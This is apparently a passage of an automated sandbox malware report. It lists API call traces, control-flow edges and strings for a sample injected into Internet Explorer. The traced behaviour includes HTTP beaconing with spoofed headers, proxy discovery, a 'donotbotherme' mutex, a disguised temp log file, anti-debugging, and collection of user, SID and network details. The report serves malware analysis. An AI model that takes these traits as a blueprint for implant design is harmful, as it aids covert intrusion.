623 513e78-513e7c call 5141f0 577->623 628 513cf9-513d04 call 5141f0 578->628 629 513d0a-513d0c call 5133c0 578->629 599 513d11-513d2f call 511da2 579->599 600 513c5b-513c5c 579->600 580->538 581->575 581->580 584->565 588->575 588->589 589->563 595->575 634 513eaf-513eba call 5141f0 596->634 635 513ec0-513ec2 call 5133c0 596->635 644 513d42-513d44 call 5133c0 599->644 645 513d31-513d3c call 5141f0 599->645 616 513c62-513c63 600->616 617 513d49-513d69 call 512004 600->617 605->575 605->606 606->522 607->578 608->575 608->607 612->577 616->575 633 513d83-513da3 call 512107 616->633 650 513d6b-513d76 call 5141f0 617->650 651 513d7c-513d7e call 5133c0 617->651 618->536 622->596 648 513e81-513e83 623->648 628->575 628->629 629->599 657 513da5-513db0 call 5141f0 633->657 658 513db6-513dc8 call 5133c0 633->658 634->575 634->635 635->545 644->617 645->575 645->644 648->575 648->622 650->575 650->651 651->633 657->575 657->658 658->523
    APIs
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
    • strstr.MSVCRT ref: 00513B2D
    • strstr.MSVCRT ref: 00513B5C
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
    • strstr.MSVCRT ref: 00513BAC
    • strstr.MSVCRT ref: 00513BCC
    • memset.MSVCRT ref: 00513BEE
    • memset.MSVCRT ref: 00513C05
      • Part of subcall function 00511B92: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000001,?,00513CC2,00000000,00000000,?), ref: 00511BA8
      • Part of subcall function 00512004: WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,HTTPS,?,?,?,00513D67,00000000,?,00000000,00000001,00000001), ref: 00512062
      • Part of subcall function 00512107: WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,HTTPS,?,?,?,00513DA1,00000000,?,00000000,?,00000000), ref: 0051215A
      • Part of subcall function 00511B49: WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000,?,?,00513E74,00000000,00000000,?), ref: 00511B60
      • Part of subcall function 00511B49: GetLastError.KERNEL32 ref: 00511B6C
      • Part of subcall function 00511BD3: WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000,?,?,00000000), ref: 00511C12
      • Part of subcall function 00511BD3: memset.MSVCRT ref: 00511C38
      • Part of subcall function 00511BD3: memset.MSVCRT ref: 00511C56
      • Part of subcall function 00511BD3: memset.MSVCRT ref: 00511C90
      • Part of subcall function 00511BD3: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000020,?,00000020,?,?,?), ref: 00511CA3
      • Part of subcall function 00511BD3: WinHttpGetProxyForUrl.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00511D33
      • Part of subcall function 00511BD3: WinHttpSetOption.WINHTTP(?,00000026,00000003,0000000C,?,?,?,?,?,?,?,?,?), ref: 00511D57
      • Part of subcall function 00511BD3: GlobalFree.KERNEL32(?), ref: 00511D71
      • Part of subcall function 00511BD3: GlobalFree.KERNEL32(?), ref: 00511D81
      • Part of subcall function 00511DA2: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00511DDE
      • Part of subcall function 00511DA2: WinHttpGetIEProxyConfigForCurrentUser.WINHTTP(?), ref: 00511E18
      • Part of subcall function 00511DA2: memset.MSVCRT ref: 00511E87
      • Part of subcall function 00511DA2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020), ref: 00511E9C
      • Part of subcall function 00511DA2: WinHttpGetProxyForUrl.WINHTTP(?,?,00000002,?), ref: 00511EB3
      • Part of subcall function 00511DA2: WinHttpSetOption.WINHTTP(?,00000026,00000003,0000000C), ref: 00511ED4
      • Part of subcall function 00511DA2: WinHttpCloseHandle.WINHTTP(?), ref: 00511EE8
      • Part of subcall function 00511DA2: ___swprintf_l.LIBCMT ref: 00511F39
      • Part of subcall function 00511DA2: GlobalFree.KERNEL32(?), ref: 00511F93
      • Part of subcall function 00511DA2: GlobalFree.KERNEL32(?), ref: 00511FA1
      • Part of subcall function 00511DA2: WinHttpOpen.WINHTTP(00000000,00000003,?,?,00000000), ref: 00511FAF
      • Part of subcall function 00511DA2: WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000), ref: 00511FE0
      • Part of subcall function 00511DA2: GetLastError.KERNEL32 ref: 00511FEC
      • Part of subcall function 0051207E: WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,00000000,?,00513F1F,00000000,?), ref: 005120EC
      • Part of subcall function 00512176: WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,HTTP,?,?,?,00513F99,00000000,?,00000000,?,00000000), ref: 005121C9
      • Part of subcall function 00518133: memset.MSVCRT ref: 00518179
      • Part of subcall function 00518133: GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
      • Part of subcall function 00518133: ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 00518133: memset.MSVCRT ref: 0051821C
      • Part of subcall function 00518133: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
      • Part of subcall function 00518133: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
      • Part of subcall function 00518133: GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
      • Part of subcall function 00518133: SetEndOfFile.KERNEL32(00000000), ref: 00518280
      • Part of subcall function 00518133: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 00518133: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
      • Part of subcall function 00518133: CloseHandle.KERNEL32(00000000), ref: 005182D2
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 0051341B
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513425
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 0051342F
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513439
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513442
      • Part of subcall function 005141F0: GetLastError.KERNEL32(?,00000000,000003E9,?,?,?,?,?,00000000), ref: 0051429E
      • Part of subcall function 005141F0: ??2@YAPAXI@Z.MSVCRT ref: 005142DC
      • Part of subcall function 005141F0: ??3@YAXPAX@Z.MSVCRT ref: 0051443D
      • Part of subcall function 005141F0: ??3@YAXPAX@Z.MSVCRT ref: 0051444B
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00517143, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 131library

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 667 517143-51716b 668 51716d-517180 LoadLibraryA GetProcAddress 667->668 669 517185-51718b 667->669 668->669 670 5171a5-5171d6 memset GetUserNameA 669->670 671 51718d-5171a0 LoadLibraryA GetProcAddress 669->671 672 5171e6-5171ff MultiByteToWideChar 670->672 673 5171d8 670->673 671->670 674 5172a3-5172b4 call 51a460 672->674 675 517205-51720b 672->675 676 5171db-5171df 673->676 675->674 677 517211-517220 675->677 676->676 678 5171e1 676->678 682 517235-51723f 677->682 683 517222-517229 677->683 678->674 684 517246-517248 682->684 683->682 684->674 685 51724a-517275 WideCharToMultiByte ConvertSidToStringSidA 684->685 686 517285-517297 call 51a805 685->686 687 517277 685->687 692 51729a 686->692 689 51727d-517281 687->689 689->689 690 517283 689->690 690->692 692->674
    APIs
    • LoadLibraryA.KERNEL32(Netapi32), ref: 00517177
    • GetProcAddress.KERNELBASE(00000000), ref: 0051717E
    • LoadLibraryA.KERNEL32(Netapi32), ref: 00517197
    • GetProcAddress.KERNEL32(00000000), ref: 0051719E
    • memset.MSVCRT ref: 005171B2
    • GetUserNameA.ADVAPI32(000001D0,?), ref: 005171CE
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000040), ref: 005171F2
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000210,00000040,00000000,00000000), ref: 0051725E
    • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 0051726E
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A832
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A8AC
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F13F5, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 162filethread
    APIs
    • IsDebuggerPresent.KERNEL32 ref: 004F142F
    • CreateThread.KERNEL32(00000000,00000000,004F120F,00000000,00000000,00000000), ref: 004F1482
    • ??2@YAPAXI@Z.MSVCRT ref: 004F14D6
      • Part of subcall function 004F268D: memset.MSVCRT ref: 004F26B8
    • ??3@YAXPAX@Z.MSVCRT ref: 004F1528
      • Part of subcall function 004F1A6D: ??2@YAPAXI@Z.MSVCRT ref: 004F1A8C
      • Part of subcall function 004F1A6D: memset.MSVCRT ref: 004F1A9C
      • Part of subcall function 004F1A6D: memcpy.MSVCRT ref: 004F1AB8
      • Part of subcall function 004F1A6D: memcpy.MSVCRT ref: 004F1AE9
      • Part of subcall function 004F1A6D: ??3@YAXPAX@Z.MSVCRT ref: 004F1AFE
      • Part of subcall function 004F1A6D: ??2@YAPAXI@Z.MSVCRT ref: 004F1B1B
    • ??3@YAXPAX@Z.MSVCRT ref: 004F154A
      • Part of subcall function 004F1C8F: ??2@YAPAXI@Z.MSVCRT ref: 004F1CAE
      • Part of subcall function 004F1C8F: memset.MSVCRT ref: 004F1CBE
      • Part of subcall function 004F1C8F: memcpy.MSVCRT ref: 004F1CDA
      • Part of subcall function 004F1C8F: memcpy.MSVCRT ref: 004F1D0B
      • Part of subcall function 004F1C8F: ??3@YAXPAX@Z.MSVCRT ref: 004F1D20
      • Part of subcall function 004F1C8F: ??2@YAPAXI@Z.MSVCRT ref: 004F1D3D
      • Part of subcall function 004F15F1: CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 004F1625
      • Part of subcall function 004F15F1: MapViewOfFile.KERNELBASE(00000000,00000022,00000000,00000000,00000000), ref: 004F1634
      • Part of subcall function 004F15F1: UnmapViewOfFile.KERNEL32(?), ref: 004F1657
      • Part of subcall function 004F15F1: CloseHandle.KERNEL32(?), ref: 004F1660
    • ??3@YAXPAX@Z.MSVCRT ref: 004F15A8
    • UnmapViewOfFile.KERNEL32(?), ref: 004F15C6
    • CloseHandle.KERNEL32(?), ref: 004F15D0
      • Part of subcall function 004F26F1: printf.MSVCRT ref: 004F2714
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    Strings
    • Ss)4:WKsRr(3/VJrQq&2.UIqPp%1-THp, xrefs: 004F14E1
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 005163DA, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 99time
    APIs
    • memset.MSVCRT ref: 00516428
    • GetTempPathA.KERNEL32(00000104,?), ref: 0051643E
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 00511024: time.MSVCRT ref: 00511080
      • Part of subcall function 00511024: srand.MSVCRT ref: 00511086
    • memset.MSVCRT ref: 005164A6
    • GetLocalTime.KERNEL32(?), ref: 005164D6
      • Part of subcall function 005135D4: __EH_prolog3_GS.LIBCMT ref: 005135DE
      • Part of subcall function 005135D4: CreateMutexA.KERNELBASE(00000000,00000001,donotbotherme,000002A8,00516509,?,?), ref: 00513607
      • Part of subcall function 005135D4: GetLastError.KERNEL32 ref: 0051360F
      • Part of subcall function 005135D4: inet_addr.WS2_32(?), ref: 005136FD
      • Part of subcall function 005135D4: GetLocalTime.KERNEL32(?,?), ref: 00513780
      • Part of subcall function 005135D4: GetLocalTime.KERNEL32(?), ref: 005137B5
      • Part of subcall function 005135D4: WaitForSingleObject.KERNEL32(?,000927C0), ref: 005137C2
      • Part of subcall function 005135D4: GetLocalTime.KERNEL32(?), ref: 005137DD
      • Part of subcall function 005135D4: WaitForSingleObject.KERNEL32(?,000927C0), ref: 005137EA
      • Part of subcall function 005135D4: time.MSVCRT ref: 005138C0
      • Part of subcall function 005135D4: srand.MSVCRT ref: 005138C7
      • Part of subcall function 005135D4: rand.MSVCRT ref: 005138D9
      • Part of subcall function 005135D4: WaitForSingleObject.KERNEL32(?,00000000), ref: 0051393E
      • Part of subcall function 005135D4: time.MSVCRT ref: 005139B0
      • Part of subcall function 005135D4: srand.MSVCRT ref: 005139B7
      • Part of subcall function 005135D4: rand.MSVCRT ref: 005139C3
      • Part of subcall function 005135D4: WaitForSingleObject.KERNEL32(?,?), ref: 00513A17
      • Part of subcall function 005135D4: CloseHandle.KERNEL32(00000000), ref: 00513A61
    • GetLocalTime.KERNEL32(?,?,?), ref: 00516512
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 0051341B
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513425
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 0051342F
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513439
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513442
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp, xrefs: 00516463
    • Client Start!, xrefs: 0051647A
    • FXSAPIDebugLogFile.tmp, xrefs: 00516444
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00514B82, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00514B9C
    • GetAdaptersInfo.IPHLPAPI(00000000,6Q), ref: 00514BAC
    • ??3@YAXPAX@Z.MSVCRT ref: 00514BB7
    • ??2@YAPAXI@Z.MSVCRT ref: 00514BC0
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00514BD0
      • Part of subcall function 00514AAC: ??2@YAPAXI@Z.MSVCRT ref: 00514AC6
      • Part of subcall function 00514AAC: GetAdaptersInfo.IPHLPAPI(00000000,00000000), ref: 00514AD6
      • Part of subcall function 00514AAC: ??3@YAXPAX@Z.MSVCRT ref: 00514AE1
      • Part of subcall function 00514AAC: ??2@YAPAXI@Z.MSVCRT ref: 00514AE9
      • Part of subcall function 00514AAC: GetAdaptersInfo.IPHLPAPI(00000000,00000000), ref: 00514AFA
      • Part of subcall function 00514AAC: ??3@YAXPAX@Z.MSVCRT ref: 00514B71
    • ??3@YAXPAX@Z.MSVCRT ref: 00514C60
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00516D52, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 49library
    APIs
    • GetModuleHandleW.KERNEL32(kernel32,GetDiskFreeSpaceExW,00000040,?,?,00517D23,00000000,00000000), ref: 00516D70
    • GetProcAddress.KERNEL32(00000000,?,?,00517D23,00000000,00000000), ref: 00516D77
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
    • GetTempPathW.KERNEL32(00000104,00000000), ref: 00516D98
    • GetDiskFreeSpaceExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00517D23,00000000,00000000), ref: 00516DAD
      • Part of subcall function 00516653: free.MSVCRT(00000000,00513A3A), ref: 0051665E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00516DF6, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 244
    APIs
    • GetLocaleInfoA.KERNEL32(00000400,00000059,00000298,00000010,00000000,00000040,00000000), ref: 00516E2D
    • GetLocaleInfoA.KERNEL32(00000400,0000005A,000002A8,00000010), ref: 00516E4F
      • Part of subcall function 0051668C: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00020019,00000000,?,005169F7,00000080,00000000,?,?,005169F7,?,?), ref: 005166CF
      • Part of subcall function 0051668C: RegCloseKey.ADVAPI32(00000000,?,?,005169F7,?,?,?,00000000,00020019), ref: 005166DA
    • __swprintf_c_l.LIBCMT ref: 0051710B
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051280C, Relevance: 72.0, APIs: 23, Strings: 18, Instructions: 275

    Control-flow Graph

    APIs
    • memset.MSVCRT ref: 0051284B
      • Part of subcall function 005123CA: memset.MSVCRT ref: 00512458
      • Part of subcall function 005123CA: rand.MSVCRT ref: 0051246D
      • Part of subcall function 005123CA: rand.MSVCRT ref: 0051249B
      • Part of subcall function 005123CA: rand.MSVCRT ref: 005124BF
      • Part of subcall function 005123CA: rand.MSVCRT ref: 005124DB
      • Part of subcall function 005123CA: rand.MSVCRT ref: 00512505
      • Part of subcall function 005123CA: rand.MSVCRT ref: 0051253C
      • Part of subcall function 005123CA: rand.MSVCRT ref: 0051257E
      • Part of subcall function 005123CA: rand.MSVCRT ref: 005125B5
      • Part of subcall function 005123CA: ___swprintf_l.LIBCMT ref: 005125E9
      • Part of subcall function 005123CA: memset.MSVCRT ref: 0051263B
      • Part of subcall function 005123CA: rand.MSVCRT ref: 00512650
      • Part of subcall function 005123CA: rand.MSVCRT ref: 0051267F
      • Part of subcall function 005123CA: rand.MSVCRT ref: 005126A4
      • Part of subcall function 005123CA: ___swprintf_l.LIBCMT ref: 005126CA
    • rand.MSVCRT ref: 00512862
    • WinHttpOpenRequest.WINHTTP(?,GET,?,00000000,00000000,00000000,-002EDD5D,?,00000000,00000000,?,00000000), ref: 005128D5
    • GetLastError.KERNEL32 ref: 005128E5
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpSetOption.WINHTTP(00000000,00000006,?,00000004), ref: 0051291B
    • WinHttpQueryOption.WINHTTP(?,0000001F,?,?), ref: 00512949
    • WinHttpSetOption.WINHTTP(?,0000001F,00003300,00000004), ref: 0051296A
    • WinHttpSetOption.WINHTTP(?,0000002F,00000000,00000000), ref: 00512972
    • memset.MSVCRT ref: 0051298A
    • ___swprintf_l.LIBCMT ref: 005129A7
    • WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 005129E0
    • GetLastError.KERNEL32 ref: 005129E6
    • memset.MSVCRT ref: 00512A0D
      • Part of subcall function 005126EC: rand.MSVCRT ref: 00512725
      • Part of subcall function 005126EC: memset.MSVCRT ref: 0051274A
      • Part of subcall function 005126EC: rand.MSVCRT ref: 0051275D
      • Part of subcall function 005126EC: rand.MSVCRT ref: 0051279E
      • Part of subcall function 005126EC: rand.MSVCRT ref: 005127C3
      • Part of subcall function 005126EC: ___swprintf_l.LIBCMT ref: 005127ED
    • ___swprintf_l.LIBCMT ref: 00512A35
    • WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512A63
    • GetLastError.KERNEL32 ref: 00512A69
    • ___swprintf_l.LIBCMT ref: 00512A8D
    • WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512ABB
    • GetLastError.KERNEL32 ref: 00512AC1
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
    • WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512B0D
    • GetLastError.KERNEL32 ref: 00512B13
    • WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512B5F
    • GetLastError.KERNEL32 ref: 00512B65
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • User-Agent: %s, xrefs: 00512996
    • GET, xrefs: 00512826, 005128D1
    • xQ, xrefs: 00512A7A
    • Accept-Encoding: gzip, deflate, xrefs: 00512B24
    • text/html,text/javascript, q=0.9,*/*, q=0.8, xrefs: 0051288D
    • image/png,image/*, q=0.8,*/*, q=0.5, xrefs: 00512899
    • WinHttpAddRequestHeaders Host failed! - %d, xrefs: 00512A70
    • Accept: %s, xrefs: 00512A86
    • */*, xrefs: 00512881
    • Accept-Language: en-US, xrefs: 00512AD2
    • WinHttpAddRequestHeaders UserAgent failed! - %d, xrefs: 005129ED
    • Host: %s, xrefs: 00512A23
    • WinHttpAddRequestHeaders 2 failed! - %d, xrefs: 00512B1A
    • POST, xrefs: 00512830
    • WinHttpAddRequestHeaders Accept failed! - %d, xrefs: 00512AC8
    • WinHttpAddRequestHeaders 3 failed! - %d, xrefs: 00512B6C
    • application/jason,application/xml, q=0.9,*/*, q=0.8, xrefs: 005128A5
    • WinHttpOpenRequest failed! - %d, xrefs: 005128EC
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005135D4, Relevance: 54.6, APIs: 18, Strings: 13, Instructions: 327time

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 64 5135d4-513617 call 51d4ab CreateMutexA GetLastError 67 51361d-513622 64->67 68 513a60 64->68 70 513624-513625 67->70 71 51362a-513696 call 517fbe * 5 call 5148a0 call 51494c 67->71 69 513a61 CloseHandle 68->69 73 513a67 69->73 70->69 90 513698-51369b 71->90 91 5136a9-5136c0 71->91 74 513a69-513a6e call 51d4f5 73->74 94 51369e-5136a3 90->94 92 5136c5-5136cf 91->92 93 5136c2-5136c4 91->93 95 5136d1 92->95 96 5136d3-5136dd call 5149dd 92->96 93->92 94->94 97 5136a5-5136a7 94->97 95->96 98 5136df-5136ec call 514b82 96->98 97->91 97->98 103 5136ee-5136f8 call 517fbe 98->103 104 5136f9-513705 inet_addr 98->104 103->104 105 513707-513709 104->105 106 51370b-51370d call 514c71 104->106 105->106 108 513712-513723 105->108 106->108 111 513732-51374a 108->111 112 513725-51372d call 517c7c 108->112 114 513754-513759 111->114 112->111 115 5137fa-513800 114->115 116 51375f-51379b GetLocalTime call 517fbe 114->116 117 513959-51396e call 513a71 115->117 118 513806-513815 115->118 125 51379d-5137a7 116->125 126 5137c6-5137cf 116->126 127 513996-51399c 117->127 128 513970-513992 call 517fbe 117->128 120 513819-513825 118->120 123 513828-51382d 120->123 123->123 133 51382f-513831 123->133 131 5137a9-5137ac 125->131 132 5137ae-5137c4 GetLocalTime WaitForSingleObject 125->132 129 5137f8 126->129 130 5137d1-5137d4 126->130 136 51399e-5139a9 call 516653 127->136 137 5139af-5139ea time srand rand 127->137 128->127 129->115 130->129 134 5137d6-5137f6 GetLocalTime WaitForSingleObject 130->134 131->129 131->132 132->125 138 513872-513879 133->138 139 513833-513839 133->139 134->129 134->130 136->137 145 5139f2-513a02 call 517fbe 137->145 146 5139ec 137->146 140 51387f-513893 138->140 141 513a3f-513a51 call 517fbe 138->141 143 51383c-513841 139->143 148 513895 140->148 149 513817 140->149 141->73 161 513a53-513a5e call 516653 141->161 143->143 152 513843-513848 143->152 154 513a07-513a17 WaitForSingleObject 145->154 146->145 153 5138ab-5138b2 148->153 149->120 152->138 155 51384a-513853 call 513a71 152->155 157 513994 153->157 158 5138b8-513947 time srand rand call 517fbe WaitForSingleObject 153->158 159 513a19 154->159 164 513858-51385a 155->164 